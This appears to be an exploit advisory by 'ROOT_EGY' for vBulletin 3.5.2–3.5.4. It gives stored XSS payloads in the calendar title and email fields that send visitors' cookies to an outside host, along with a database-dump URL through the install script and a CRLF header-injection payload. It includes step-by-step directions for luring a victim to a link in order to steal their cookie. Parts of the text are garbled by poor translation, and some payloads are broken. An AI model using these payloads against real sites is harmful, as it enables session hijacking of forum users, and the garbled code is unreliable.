# Title: vBulletin Version 3.5.2 - Introduction XSS scripting# Author: Discovered by ROOT_EGY# Version: vBulletin Version 3.5.2===============================================
WWW.sec-war.com
===============================================3.5.2- Introduction XSS scripting
The vulnerability isin the field «title» scenario «calendar.php».
Example:
TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie;</ script>
BODY :----> No matter
OTHER OPTIONS:-> No matter
That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie;</ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.3.5.3- Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password».
Example:
www.server.som/forumpath/profile.php?do=editpassword
pass: your pass
email: vashe@milo.com "><script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie;</ script>. nomatt
Note About lenght limitation
****
forum / profile.php? do = editoptions
Receive Email from Other Members = yes
****
www.server.com/forumpath/sendmessage.php?do=mailmember&u =(your id)
In the email write vashe@milo.com "><script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie;</ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u =(your id)and get a cookie on our address sniffer.3.5.4- Dump database
The vulnerability isin the scripts directory upgrade_301.php 'install'.
Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord
3.5.4- Introduction XSS scripting
The vulnerability isin the url parameter scenario inlinemod.php.
Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:%2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a
===============================================
ROOT_EGYto connect: r0t@hotmail.es
===============================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.===============================================